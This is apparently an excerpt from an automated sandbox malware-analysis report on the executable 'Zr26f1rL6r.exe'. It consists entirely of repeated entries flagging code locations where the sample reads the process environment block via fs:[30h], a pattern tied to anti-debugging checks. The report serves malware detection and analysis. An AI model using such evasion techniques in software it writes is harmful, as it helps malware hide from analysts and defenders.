        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E943C57 mov eax, dword ptr fs:[00000030h]10_2_1E943C57
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BDC40 mov eax, dword ptr fs:[00000030h]10_2_1E8BDC40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C40 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8FBC6E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]10_2_1E8FBC6E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCC68 mov eax, dword ptr fs:[00000030h]10_2_1E8BCC68
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C0C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C0C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C0C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C8C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C8C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C8C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C8C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]10_2_1E8C8C79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]10_2_1E8BCD8A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]10_2_1E8BCD8A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C6D91 mov eax, dword ptr fs:[00000030h]10_2_1E8C6D91
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B6DA6 mov eax, dword ptr fs:[00000030h]10_2_1E8B6DA6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2DBC mov eax, dword ptr fs:[00000030h]10_2_1E8F2DBC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2DBC mov ecx, dword ptr fs:[00000030h]10_2_1E8F2DBC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C7DB6 mov eax, dword ptr fs:[00000030h]10_2_1E8C7DB6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BDDB0 mov eax, dword ptr fs:[00000030h]10_2_1E8BDDB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994DA7 mov eax, dword ptr fs:[00000030h]10_2_1E994DA7
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E97ADD6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]10_2_1E97ADD6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B8DCD mov eax, dword ptr fs:[00000030h]10_2_1E8B8DCD
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]10_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8CBDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFDE0 mov eax, dword ptr fs:[00000030h]10_2_1E8EFDE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BEDFA mov eax, dword ptr fs:[00000030h]10_2_1E8BEDFA
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]10_2_1E98CDEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]10_2_1E98CDEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]10_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E0D01 mov eax, dword ptr fs:[00000030h]10_2_1E8E0D01
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]10_2_1E94CD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]10_2_1E94CD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8ECD10 mov eax, dword ptr fs:[00000030h]10_2_1E8ECD10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8ECD10 mov ecx, dword ptr fs:[00000030h]10_2_1E8ECD10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]10_2_1E97BD08
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]10_2_1E97BD08
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E958D0A mov eax, dword ptr fs:[00000030h]10_2_1E958D0A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BFD20 mov eax, dword ptr fs:[00000030h]10_2_1E8BFD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov ecx, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]10_2_1E8EAD20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]10_2_1E970D24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]10_2_1E970D24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]10_2_1E970D24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]10_2_1E970D24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8DDD4D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8DDD4D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]10_2_1E8DDD4D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941D5E mov eax, dword ptr fs:[00000030h]10_2_1E941D5E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8B9D46
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]10_2_1E8B9D46
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B9D46 mov ecx, dword ptr fs:[00000030h]10_2_1E8B9D46
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994D4B mov eax, dword ptr fs:[00000030h]10_2_1E994D4B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]10_2_1E93CD40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]10_2_1E93CD40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]10_2_1E985D43
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]10_2_1E985D43
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8C1D50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]10_2_1E8C1D50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D5D60 mov eax, dword ptr fs:[00000030h]10_2_1E8D5D60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E966D79 mov esi, dword ptr fs:[00000030h]10_2_1E966D79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E945D60 mov eax, dword ptr fs:[00000030h]10_2_1E945D60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E995D65 mov eax, dword ptr fs:[00000030h]10_2_1E995D65
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8FBD71
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]10_2_1E8FBD71
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BBA80 mov eax, dword ptr fs:[00000030h]10_2_1E8BBA80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E976A80 mov eax, dword ptr fs:[00000030h]10_2_1E976A80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E967ABE mov eax, dword ptr fs:[00000030h]10_2_1E967ABE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8F9ABF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8F9ABF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]10_2_1E8F9ABF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97DAAF mov eax, dword ptr fs:[00000030h]10_2_1E97DAAF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8D0ACE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]10_2_1E8D0ACE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EDAC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]10_2_1E8C0AED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]10_2_1E8C0AED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]10_2_1E8C0AED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8E0AEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8E0AEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]10_2_1E8E0AEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BFAEC mov edi, dword ptr fs:[00000030h]10_2_1E8BFAEC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C9AE4 mov eax, dword ptr fs:[00000030h]10_2_1E8C9AE4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]10_2_1E940AFF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]10_2_1E940AFF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]10_2_1E940AFF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994AE8 mov eax, dword ptr fs:[00000030h]10_2_1E994AE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8D3AF6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8D3AF6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8D3AF6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8D3AF6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]10_2_1E8D3AF6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8FAA0E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]10_2_1E8FAA0E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94DA31 mov eax, dword ptr fs:[00000030h]10_2_1E94DA31
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97DA30 mov eax, dword ptr fs:[00000030h]10_2_1E97DA30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8C1A24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]10_2_1E8C1A24
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EDA20 mov edx, dword ptr fs:[00000030h]10_2_1E8EDA20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8B7A30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8B7A30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]10_2_1E8B7A30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]10_2_1E944A57
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]10_2_1E944A57
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8F9A48
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]10_2_1E8F9A48
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8EEA40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]10_2_1E8EEA40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BFA44 mov ecx, dword ptr fs:[00000030h]10_2_1E8BFA44
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94DA40 mov eax, dword ptr fs:[00000030h]10_2_1E94DA40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]10_2_1E95AA40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]10_2_1E95AA40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]10_2_1E98BA66
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]10_2_1E98BA66
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]10_2_1E98BA66
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]10_2_1E98BA66
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94DB90 mov eax, dword ptr fs:[00000030h]10_2_1E94DB90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941B93 mov eax, dword ptr fs:[00000030h]10_2_1E941B93
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1B80 mov eax, dword ptr fs:[00000030h]10_2_1E8D1B80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F1B9C mov eax, dword ptr fs:[00000030h]10_2_1E8F1B9C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]10_2_1E988BBE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]10_2_1E988BBE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]10_2_1E988BBE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]10_2_1E988BBE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8C3BA4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8C3BA4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8C3BA4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8C3BA4
